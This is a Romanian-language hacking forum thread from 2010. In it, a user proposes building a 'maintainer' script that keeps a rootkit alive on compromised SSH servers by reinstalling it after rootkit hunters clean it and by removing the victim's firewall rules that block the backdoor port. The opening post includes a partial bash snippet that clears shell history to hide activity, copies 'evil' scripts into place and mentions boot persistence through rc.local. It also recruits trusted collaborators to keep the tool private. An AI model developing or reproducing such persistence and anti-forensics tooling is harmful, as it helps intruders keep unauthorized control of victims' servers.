Flubber Posted August 5, 2010 Report Posted August 5, 2010 In primul rand as dori sa intreb cati dintre voi folosesc rootkit-uri pe ssh-uri. Daca da, ati experimentat ca victima sa foloseasca rootkit hunter, sau alte 'programe' de detectarea/curatarea rootkit-urilor? Daca da, ce spuneti daca am face un maintainer, adica un script mai complex la care, in caz ca rootkit-ul tau va fi scos, sau eventual port-ul pe care backdoor-ul rootkit-ului "tau" l-a deschis este blocat in firewall (sa zicem... iptables) eventual maintainer-ul sa scoata acea regula, si sa aduca totul la ... "normal" (pentru tine). Ce ziceti? Idei,sugestii,impotriviri,critici?// Adaugare: Am uitat sa mentionez, cati dintre voi stiti BASH si un limbaj de programare?// O alta adaugare: Am uitat sa mentionez ca eu deja lucrez la un programel de genul asta, dar nu este foarte elaborat, cu ajutorul lui cmiN am reusit sa fac ceva ceva .... nu foarte super ci foarte primitv, in Python si BASH.Un mic snippet:[B]a[/B](fisierul fiind executabil [chmod +x]):#!/bin/bashecho "[#] Flubber | 2010 | with help from cmiN -- many thanks."echo "[#] Keep it private (DO NOT DISTRIBUTE) and enjoy."echo "[*] Unsetting some history."unset HISTFILEunset HISTLOGunset HISTSAVEhistory -cecho "[*] Please wait while I will check if you are root."if [ "$(whoami)" != "root" ]; then echo "[-] Sorry, you are not root. This script requires for you to be root in order to execute. Exiting." exit 1;else echo "[+] You are root. Proceeding further." echo "[*] Trying to get a way in this system and copy our 'toys' there." mkdir TARGET cp 1.py TARGET cp b.sh TARGET history -c echo "[+] Done. Also cleaned some history. Isn't that cute?" echo "[*] Chmodding our ev4l scr1p7s to execute." chmod +x TARGET/script.py chmod +x TARGET/scriptbash echo "[+] Ev4l scr1p7s chmodded to execute." [...] alte prostioare, cum ar fi adaugarea la boot-up prin rc.local si alte balarii [...]fistiu ca verificarea cu whoami e o prostie, nu sunt sigur insa, nu am testat sa fac un user cu acces de root direct (uid 0, gid 0) si sa vad daca la whoami este user-ul si nu mai spune root (in cazul asta scriptul bash de initiere ar esua)pareri, opinii, se ofera cineva sa imbunatatim, sunt curios cati se baga care AU HABAR si sa fie de incredere, insemnand sa nu dea aiurea script-urile, catre script kiddies (nu ca eu nu as fi unul) care sa imprastie mai departe, ci sa fie tinuta mai.. "secret" arhiva, adica sa o aiba si sa o foloseasca doar cei CARE MERITAsi aici ar fi fost in folos acea sectiune privata magica minuneas intra in mai multe detalii, dar mai intai sa vad daca a avut cineva experiente de genul, specificati si rootkit-ul daca doriti, eu unul fac asta pentru VTBoV05RPT0= (dati de 2 ori stiti voi ce) Quote
kasmir Posted August 5, 2010 Report Posted August 5, 2010 Majoritatea ne-am gandit la ideea asta, dar nu se stie cine poate s-o duca la perfectiune, ideea este ca o sa ai foarte mult de munca. Multa bafta! Quote
Flubber Posted August 5, 2010 Author Report Posted August 5, 2010 Majoritatea ne-am gandit la ideea asta, dar nu se stie cine poate s-o duca la perfectiune, ideea este ca o sa ai foarte mult de munca. Multa bafta!Poftim? Pai thread-ul asta a fost mai mult ca o invitatie la proiect, sa ne punem mai multi (cat mai multi) cu experienta capatanile la contributie si sa-l facem foarte foarte complex si eficient, adaugandu-i diferite optiuni. Quote
kasmir Posted August 6, 2010 Report Posted August 6, 2010 Eu momentan nu pot, pentru sa sunt plecat din tara si nu am timp, mai am pana ma intorc in romania 47 zile oricum nu il terminati pana atunci, poate o sa ma implic si eu daca nu o sa fie prea tarziu! Quote